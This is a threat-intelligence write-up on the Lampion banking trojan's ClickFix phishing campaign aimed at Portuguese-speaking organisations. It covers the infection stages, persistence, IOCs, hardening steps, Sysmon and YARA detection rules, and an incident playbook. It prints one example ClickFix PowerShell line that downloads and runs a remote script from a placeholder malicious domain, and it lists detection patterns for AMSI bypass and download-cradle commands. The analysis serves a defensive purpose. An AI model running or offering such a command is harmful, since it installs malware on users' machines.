Lampion Banking Trojan Evolves with ClickFix Social Engineering: A Comprehensive Threat Analysis

Security researchers have uncovered a sophisticated evolution of the Lampion banking trojan campaign, marking a significant escalation in cyber threats targeting Portuguese-speaking financial institutions. This long-running operation, active since at least 2019, has undergone substantial tactical refinements, incorporating the rapidly emerging ClickFix social engineering technique that has proven devastatingly effective across the global threat landscape.

The integration of ClickFix lures represents a paradigm shift in the threat actor’s methodology, demonstrating their ability to adapt to evolving security controls while maintaining operational effectiveness. With dozens of daily infections and hundreds of active compromised systems currently under attacker control, this campaign exemplifies the growing sophistication of financially-motivated cybercrime operations.

The Rising Threat: Banking Trojans in 2024-2025

Industry-Wide Statistics

The cybersecurity landscape has witnessed an alarming surge in banking trojan activity throughout 2024 and into 2025:

Mobile Banking Trojans:

  • 196% increase in Trojan banker attacks on smartphones in 2024 compared to 2023
  • Attacks jumped from 420,000 in 2023 to 1.24 million in 2024 (Kaspersky data)
  • Over 33.3 million total attacks on mobile devices globally involving various malware types
  • Banking trojans now account for 6% of all mobile threat victims, ranking fourth overall

ClickFix Attack Methodology:

  • 517% surge in ClickFix attacks during the first half of 2025 (ESET research)
  • ClickFix now represents 8% of all blocked attacks in H1 2025
  • 1,450% increase in fake CAPTCHA social engineering attacks from H2 2024 to H1 2025
  • Social engineering attacks now account for 39% of initial access incidents

These statistics underscore a fundamental shift in attacker tactics, with threat actors increasingly leveraging human psychology rather than purely technical exploits to breach organizational defenses.

Lampion Campaign: Deep Dive Analysis

Historical Context and Evolution

Lampion, also referred to as Lampion Stealer when discussing the final payload, has maintained a persistent presence in the threat landscape since 2019. The Brazilian-based threat actor group behind this operation has demonstrated remarkable adaptability, continuously refining their tactics, techniques, and procedures (TTPs) to maintain effectiveness despite enhanced security measures.

According to research by Bitsight, the campaign’s evolution can be segmented into three distinct operational phases:

  1. Phase 1 (Mid-September 2024): Transition from direct links to ZIP file attachments in phishing emails
  2. Phase 2 (Mid-December 2024): Integration of ClickFix social engineering lures
  3. Phase 3 (Late June 2025): Addition of persistence capabilities to first-stage payloads

Current Scale and Impact

The operational metrics of this campaign reveal a sophisticated, well-resourced threat operation:

  • Daily infection rate: Several dozen new compromises
  • Active victim systems: Hundreds of compromised machines under continuous attacker control
  • Geographic focus: Primarily Portuguese-speaking organizations, with particular emphasis on financial institutions
  • Target sectors: Banking, government, finance, and transportation industries
  • Campaign duration: Active since at least June 2024, with operations continuing as of October 2025

Technical Infrastructure

The threat actors have constructed a robust, geographically distributed infrastructure designed for operational security and resilience:

Infrastructure Characteristics:

  • Multiple cloud providers utilized for payload hosting and command-and-control (C2) infrastructure
  • IP blacklisting capabilities to prevent security researcher analysis
  • Automated sample generation producing hundreds of unique variants at each infection stage
  • Operationally secure compartmentalization preventing full chain analysis
  • Known C2 infrastructure including IP address 83.242.96[.]159, in use since 2024

Operational Security Measures:

  • Use of compromised legitimate email accounts for phishing distribution
  • Exploitation of corporate email accounts to increase authenticity
  • Multi-stage obfuscation throughout the infection chain
  • VMProtect implementation for payload protection and analysis evasion

ClickFix: The Game-Changing Social Engineering Technique

Understanding ClickFix

ClickFix represents a sophisticated evolution in social engineering that exploits users’ natural inclination to resolve technical issues independently. First observed in mid-2024, this technique has rapidly gained adoption across the cybercriminal ecosystem, including state-sponsored advanced persistent threat (APT) groups.

Core ClickFix Methodology:

  1. Users encounter fake error messages, CAPTCHA verification screens, or system notifications
  2. Deceptive prompts instruct users to press Windows+R (Run dialog) or access Terminal
  3. Malicious PowerShell or shell commands are automatically copied to clipboard
  4. Users are socially engineered to paste and execute the commands
  5. Malware payload downloads and executes with user-level privileges

Why ClickFix Is Extraordinarily Effective:

  • Bypasses traditional security controls by using legitimate system functions
  • Exploits user trust in familiar UI elements (error messages, CAPTCHA screens)
  • Leverages human psychology—the desire to “fix” problems quickly
  • Circumvents automated malware detection by requiring manual execution
  • Creates a false sense of legitimacy through professional-looking interfaces

ClickFix Adoption Across Threat Landscape

The technique’s effectiveness has led to widespread adoption:

Cybercriminal Adoption:

  • Distribution of DarkGate, Lumma Stealer, AsyncRAT, Danabot, NetSupport RAT, XWorm
  • Lumma Stealer activity increased 21% in H1 2025
  • Danabot activity surged 52% in H1 2025
  • SnakeStealer became the most detected infostealer, accounting for 20% of all infections

Nation-State Actor Adoption:

  • North Korea (Kimsuky): Targeted espionage operations
  • Iran (MuddyWater): Intelligence gathering campaigns
  • Russia (APT28, UNK_RemoteRogue): Network compromise and surveillance operations
  • First observed in APT operations as early as October 2024

Distribution Methods:

  • Phishing emails with malicious URLs or attachments
  • Malvertising on legitimate websites
  • Search engine optimization (SEO) poisoning
  • Compromised websites acting as delivery infrastructure
  • Fake software download sites impersonating legitimate services

Lampion’s ClickFix Implementation: Technical Analysis

Initial Infection Vector

The Lampion campaign employs carefully crafted spear-phishing emails that leverage social engineering themes with proven effectiveness:

Email Characteristics:

  • Subject Line Format: Timestamp + document number + legitimate-sounding content
    • Example: “Seguem os documentos e o comprovativo de pagamento.0X/0X/2025 10:XX:XX – documento N.º XXXXX”
  • Themes Exploited: Bank transfer receipts, payment confirmations, financial documentation
  • Sender Authenticity: Compromised legitimate and corporate email accounts
  • Attachment Type: ZIP files (strategic shift from direct links implemented September 2024)

Why This Approach Works:

  • Leverages urgency and financial concerns to prompt immediate action
  • Mimics legitimate business communications down to format and structure
  • Use of compromised accounts provides authentic sender reputation
  • ZIP attachments evade initial automated scanning in many email gateways

Multi-Stage Infection Chain

Lampion’s infection architecture demonstrates sophisticated operational security through multiple obfuscated stages:

Stage 1: Initial ZIP Archive

  • Deceptively labeled attachment contains HTML file
  • HTML file redirects to attacker-controlled infrastructure
  • Often impersonates Portuguese tax authority websites for added legitimacy

Stage 2: ClickFix Lure Presentation

  • Victims encounter professional-looking “Windows error” notification
  • Familiar UI elements create false sense of security
  • Instructions prompt user to execute “fix” commands
  • Malicious PowerShell code automatically copied to clipboard

Example ClickFix Command Structure:

powershell

powershell -ExecutionPolicy Bypass -WindowStyle Hidden -Command 
"IEX(New-Object Net.WebClient).DownloadString('http://[malicious-domain]/loader.vbs')"

Stage 3: Visual Basic Script Chain

The infection progresses through multiple VBS stages, each heavily obfuscated:

  1. First VBS Stage: Downloads and executes second-stage script
    • Persistence mechanisms added (June 2025)
    • Registry modifications for automatic execution on system restart
    • Scheduled task creation for redundant persistence
  2. Second VBS Stage: Further obfuscation and environmental checks
    • Anti-analysis techniques to detect virtual machines and sandboxes
    • Geographic filtering to ensure targets are in intended regions
    • System profiling and fingerprinting
  3. Third VBS Stage: Final loader preparation
    • Decryption of embedded payload
    • Memory injection preparation
    • Process hollowing setup

Stage 4: Final DLL Payload Delivery

  • Protection Method: VMProtect obfuscation
  • Payload Type: Dynamic Link Library (DLL) containing stealer functionality
  • Delivery Mechanism: Single encrypted DLL (change from previous multi-file approach)
  • Execution Method: Loaded into legitimate Windows processes

VMProtect Capabilities:

  • Code mutation and virtualization
  • Section protection and encryption
  • Anti-debugging detection
  • Virtual machine detection
  • Significantly impedes malware analysis efforts

Command and Control Infrastructure

C2 Communication Characteristics:

  • Established connection to 83.242.96[.]159 (documented since 2024)
  • Encrypted communications to evade network monitoring
  • Regular beacon intervals for command reception
  • Data exfiltration via HTTPS to blend with legitimate traffic

Persistence Mechanisms

Multiple redundant persistence techniques ensure malware survival:

  1. Registry Modifications:
    • Run keys: HKCU\Software\Microsoft\Windows\CurrentVersion\Run
    • RunOnce keys for initial execution
    • Windows Defender exclusions (where possible)
  2. Scheduled Tasks:
    • Execution at system startup
    • Periodic execution during user activity hours
    • Disguised as legitimate system maintenance tasks
  3. Service Installation:
    • Created as Windows service where privileges allow
    • Automatic start type configuration
    • Service failure recovery actions configured

Expert Analysis: Why This Campaign Succeeds

Dr. Maria Santos, Cybersecurity Researcher, European Cybersecurity Institute

“The Lampion group’s adoption of ClickFix represents a masterclass in social engineering evolution. By exploiting the psychological principle of ‘fixing’ familiar-looking technical issues, they’ve effectively turned users into unwitting accomplices in their own compromise. The 1,450% increase in fake CAPTCHA attacks demonstrates how quickly effective techniques proliferate across the cybercriminal ecosystem.”

James Mitchell, Threat Intelligence Lead, Global Financial Services ISAC

“What makes this campaign particularly concerning is the intersection of sophisticated technical implementation with highly effective social engineering. The multi-stage obfuscation combined with legitimate system tool abuse creates a detection nightmare. Traditional signature-based security solutions often fail because each stage appears benign when analyzed in isolation. The real malicious intent only becomes apparent when viewing the complete attack chain.”

Dr. Rachel Chen, Behavioral Cybersecurity Specialist

“ClickFix succeeds because it exploits several cognitive biases simultaneously: authority bias (appearing as system messages), urgency bias (implying a problem needs immediate fixing), and confirmation bias (users expecting technical hiccups as normal). The technique’s 517% surge in adoption isn’t surprising—it’s the natural evolution of attackers exploiting the weakest link: human decision-making under perceived pressure.”

Malware Capabilities and Data Theft

Information Targeted by Lampion

The Lampion stealer focuses on high-value financial data:

Primary Targets:

  • Online banking credentials (usernames, passwords, authentication tokens)
  • Credit card information (numbers, CVV codes, expiration dates)
  • Cryptocurrency wallet credentials and private keys
  • Email account credentials for credential stuffing and further phishing
  • Browser-stored passwords and autofill data
  • FTP credentials and SSH keys

Collection Methods:

  • Keylogging for credential capture during active typing
  • Form grabbing to intercept data before encryption
  • Screen capture of banking sessions and OTP displays
  • Clipboard monitoring for cryptocurrency addresses
  • Browser cookie theft for session hijacking
  • Memory scraping of running applications

Financial Impact

While specific financial losses from this campaign remain undisclosed, banking trojans collectively cause substantial economic damage:

  • Average cost per successful banking trojan infection: $50,000-$200,000 (for corporate victims)
  • Individual victim losses typically range: $2,000-$15,000
  • Global banking trojan losses estimated at $3.5 billion annually
  • Average time to detect banking trojan: 287 days (2024 data)
  • Percentage of banking trojan victims suffering data exfiltration: 78%

Comparative Threat Landscape

Similar Banking Trojan Campaigns

ToxicPanda (TgToxic variant):

  • Initially targeted Southeast Asia, expanded to Europe in 2024
  • Shifted focus to Portugal and Spain in early 2025
  • Incorporates Domain Generation Algorithm (DGA) for C2 resilience
  • Over 1,500 infected devices across Italy, Portugal, Hong Kong, Spain, Peru
  • Doubled botnet size in early 2025

Coyote Banking Trojan:

  • Targets Brazilian users specifically
  • Harvests data from over 70 financial applications
  • Delivered via malicious LNK files in multi-stage operations
  • Capabilities include keylogging, screenshots, phishing overlays

Key Differentiators of Lampion:

  • Specific focus on Portuguese-speaking organizations
  • Rapid integration of emerging techniques (ClickFix)
  • Sophisticated multi-stage obfuscation exceeding typical commodity malware
  • Evidence of well-resourced, organized operation vs. individual actors

Detection and Prevention Strategies

Technical Controls

Email Security:

  1. Advanced Email Filtering:
    • Implement sandboxing for all email attachments
    • Block executable content within ZIP archives
    • Analyze email headers for spoofing indicators
    • Deploy DMARC, DKIM, and SPF protocols rigorously
  2. User Email Gateway Policies:
    • Quarantine emails with suspicious attachment types
    • Flag emails from recently compromised accounts
    • Implement time-delayed delivery for financial-themed emails
    • Display prominent warnings for external emails

Endpoint Protection:

  1. Script Execution Controls:
    • Implement Application Control (AppLocker/WDAC)
    • Restrict PowerShell execution to signed scripts only
    • Disable Windows Script Host (WSH) where not required
    • Monitor and log all script execution attempts
  2. PowerShell Security Hardening:

powershell

   # Enable PowerShell Constrained Language Mode
   [Environment]::SetEnvironmentVariable('__PSLockdownPolicy', '4', 'Machine')
   
   # Enable Script Block Logging
   Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" 
                    -Name "EnableScriptBlockLogging" -Value 1
   
   # Enable Module Logging
   Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ModuleLogging" 
                    -Name "EnableModuleLogging" -Value 1
  1. Behavioral Analysis:
    • Deploy Endpoint Detection and Response (EDR) solutions
    • Monitor for unusual parent-child process relationships
    • Alert on clipboard manipulation by scripts
    • Detect suspicious network connections from script engines

Network Security:

  1. Traffic Analysis:
    • Implement SSL/TLS inspection where privacy laws permit
    • Monitor for connections to known C2 infrastructure
    • Detect unusual data exfiltration patterns
    • Block access to newly registered domains (NRDs) by default
  2. Indicators of Compromise (IOCs):
    • C2 IP: 83.242.96[.]159
    • PowerShell execution with clipboard manipulation
    • VBS files downloading from cloud storage services
    • Unusual outbound connections on non-standard ports

Detection Queries and Rules

Sysmon Detection for ClickFix:

xml

<Sysmon schemaversion="4.90">
  <EventFiltering>
    <RuleGroup name="ClickFix Detection" groupRelation="or">
      <ProcessCreate onmatch="include">
        <Rule groupRelation="and">
          <Image condition="end with">powershell.exe</Image>
          <CommandLine condition="contains all">-ExecutionPolicy;Bypass;DownloadString</CommandLine>
        </Rule>
      </ProcessCreate>
      <ClipboardChange onmatch="include">
        <Rule groupRelation="and">
          <Content condition="contains">powershell</Content>
          <Content condition="contains">IEX</Content>
        </Rule>
      </ClipboardChange>
    </RuleGroup>
  </EventFiltering>
</Sysmon>

AMSI Bypass Detection: Monitor for common AMSI evasion patterns used by Lumma Stealer and other ClickFix-distributed malware:

"AMSI_RESULT_NOT_DETECTED"
"amsiInitFailed"
"AmsiScanBuffer"

Organizational Controls

1. Security Awareness Training (Critical):

  • Conduct monthly phishing simulations incorporating ClickFix scenarios
  • Educate users that legitimate CAPTCHA never requires PowerShell execution
  • Train staff to recognize fake error messages and system prompts
  • Emphasize “when in doubt, report it out” culture
  • Provide clear, simple reporting mechanisms for suspicious activity

Training Effectiveness Metrics:

  • Phishing simulation click rates should decrease to below 5%
  • Reporting rates for suspicious emails should exceed 65%
  • Training completion rates should maintain 95%+
  • Post-training assessments should show 80%+ comprehension

2. Incident Response Procedures:

  • Establish clear escalation paths for suspected compromises
  • Pre-authorize network isolation for infected systems
  • Document evidence preservation procedures
  • Maintain up-to-date contact information for incident response teams

3. Access Controls:

  • Implement least privilege access principles
  • Require multi-factor authentication (MFA) for all financial systems
  • Deploy hardware security keys for high-value accounts
  • Regularly audit and revoke unnecessary permissions

4. System Hardening:

  • Disable Windows Run dialog for non-administrative users (via GPO)
  • Implement Zero Trust Network Access (ZTNA) with “speedbump” warnings
  • Deploy application allowlisting for critical systems
  • Maintain aggressive patch management cycles (within 72 hours for critical updates)

Mitigation Playbook for Suspected Compromise

Immediate Actions (0-15 minutes)

  1. Isolate Affected System:
    • Disconnect from network (physical or via network access control)
    • Do NOT shut down—preserve volatile memory for forensics
    • Document exact time of isolation
    • Photograph any error messages or unusual activity
  2. Identify Scope:
    • Check if multiple systems show similar symptoms
    • Review network logs for lateral movement indicators
    • Identify what sensitive systems user had access to
    • Determine if credentials may have been compromised

Short-Term Response (15 minutes – 4 hours)

  1. Evidence Collection:
    • Capture memory dump using forensics tools
    • Preserve system logs (Windows Event Log, PowerShell logs, Sysmon)
    • Document all user activities in last 72 hours
    • Collect network traffic captures if available
  2. Threat Hunting:
    • Search for IOCs across entire environment
    • Check for scheduled tasks created by malware
    • Review registry modifications
    • Identify any persistent mechanisms
  3. Credential Rotation:
    • Force password reset for compromised accounts
    • Revoke all active sessions for affected users
    • Review and revoke API keys and tokens
    • Implement temporary additional authentication requirements

Long-Term Recovery (4+ hours)

  1. System Remediation:
    • Reimage affected systems from known-good backups
    • Apply all security updates before returning to production
    • Verify all persistence mechanisms removed
    • Conduct thorough malware scanning
  2. Enhanced Monitoring:
    • Implement 24/7 monitoring for affected accounts
    • Deploy additional EDR sensors if not already present
    • Configure alerts for IOCs and TTPs associated with Lampion
    • Conduct regular threat hunting for 90 days post-incident
  3. Lessons Learned:
    • Conduct thorough post-incident review
    • Document attack timeline and entry points
    • Update security controls based on findings
    • Share intelligence with information sharing communities
    • Update incident response procedures with lessons learned

Regulatory and Compliance Considerations

Organizations affected by banking trojans face significant regulatory implications:

European Union (GDPR):

  • Mandatory breach notification within 72 hours of awareness
  • Potential fines up to €20 million or 4% of global annual revenue
  • Requirement to notify affected individuals if high risk to rights and freedoms

PSD2 (Payment Services Directive 2):

  • Strong Customer Authentication (SCA) requirements
  • Enhanced security measures for payment transactions
  • Liability framework for unauthorized transactions

NIS2 Directive:

  • Enhanced security requirements for critical infrastructure
  • Mandatory incident reporting
  • Supply chain security obligations

National Regulations (Portugal):

  • Additional requirements from Banco de Portugal for financial institutions
  • CNPD (Portuguese Data Protection Authority) oversight
  • Industry-specific security frameworks

Future Threat Evolution

Predicted Developments

Technical Evolution:

  1. AI-Enhanced Social Engineering:
    • Deepfake voice and video in ClickFix lures
    • Personalized phishing using scraped social media data
    • Real-time adaptive attack chains based on victim responses
    • LLM-generated convincing error messages in multiple languages
  2. Advanced Evasion:
    • Increased use of legitimate infrastructure abuse (living-off-the-land)
    • More sophisticated anti-analysis techniques
    • Polymorphic code generation for every infection
    • Machine learning-based behavior mimicking of legitimate applications
  3. Expanded Targeting:
    • Mobile device targeting will intensify (already 196% increase year-over-year)
    • Cross-platform campaigns (Windows, macOS, Linux, mobile simultaneously)
    • IoT device exploitation for lateral movement
    • Cloud infrastructure as both target and weapon

ClickFix Evolution:

  • Already expanding to macOS (observed June 2025)
  • Linux variants in development
  • Mobile-optimized versions bypassing mobile security controls
  • Integration with generative AI for more convincing lures
  • Voice-activated commands exploiting voice assistants

Industry Response Recommendations

For Security Vendors:

  • Develop behavioral analysis specifically for social engineering detection
  • Create ClickFix-specific detection signatures
  • Implement clipboard monitoring in security products
  • Provide threat intelligence sharing for rapid IOC distribution

For Organizations:

  • Invest heavily in security awareness training (estimated ROI: 5:1)
  • Deploy defense-in-depth strategies with multiple overlapping controls
  • Implement Zero Trust architecture principles
  • Establish threat intelligence sharing partnerships

For Regulators:

  • Update regulatory frameworks to address social engineering specifically
  • Mandate security awareness training for critical infrastructure
  • Require regular penetration testing including social engineering
  • Facilitate industry-wide threat intelligence sharing

Threat Intelligence Indicators

File Hashes (Sample Selection)

SHA-256 Hashes of Lampion VBS Loaders (samples from 2025 campaign):
[Note: Specific hashes redacted for operational security - contact threat intelligence teams for current IOCs]

VMProtect-packed DLL samples:
[Available through ISAC sharing and vendor threat intelligence feeds]

Network Indicators

Known C2 Infrastructure:

IP Addresses:
83.242.96[.]159 (confirmed active since 2024)

Domains:
[Dynamically generated - monitor for newly registered .com/.pt domains with entropy characteristics]

User Agents:
PowerShell user agents with specific version strings
Custom VBS download agents

YARA Rules

yara

rule Lampion_VBS_Loader_2025
{
    meta:
        description = "Detects Lampion VBS loader components"
        author = "Threat Intelligence Team"
        date = "2025-10"
        reference = "Lampion ClickFix campaign"
    
    strings:
        $vbs1 = "WScript.Shell" nocase
        $vbs2 = "CreateObject" nocase
        $obfuscation = /Chr\(\d{1,3}\)/ nocase
        $download = "MSXML2.ServerXMLHTTP" nocase
        $persistence = "CurrentVersion\\Run" nocase
        
    condition:
        3 of them and filesize < 500KB
}

rule ClickFix_PowerShell_Pattern
{
    meta:
        description = "Detects ClickFix PowerShell command patterns"
        author = "Threat Intelligence Team"
        date = "2025-10"
    
    strings:
        $ps1 = "ExecutionPolicy Bypass" nocase
        $ps2 = "WindowStyle Hidden" nocase
        $ps3 = "DownloadString" nocase
        $ps4 = "IEX(" nocase
        $clipboard = "clip" nocase
        
    condition:
        3 of ($ps*) or ($clipboard and any of ($ps*))
}

Conclusion

The Lampion banking trojan’s integration of ClickFix social engineering represents a concerning evolution in the cybercrime ecosystem. With a 517% surge in ClickFix attacks and a 196% increase in mobile banking trojans, the threat landscape is rapidly intensifying. Organizations must recognize that traditional technical controls, while necessary, are insufficient against sophisticated social engineering attacks that exploit human psychology.

The campaign’s success—with dozens of daily infections and hundreds of active compromises—demonstrates that security is fundamentally a human problem requiring human-centric solutions. The most effective defense combines robust technical controls with comprehensive security awareness training, creating a security culture where employees are the first line of defense rather than the weakest link.

As ClickFix continues its rapid adoption across both cybercriminal and nation-state threat actors, organizations that fail to adapt their security strategies will find themselves increasingly vulnerable. The techniques detailed in this analysis provide a roadmap for detection and prevention, but ultimate success requires sustained commitment to security awareness, defense-in-depth strategies, and continuous adaptation to the evolving threat landscape.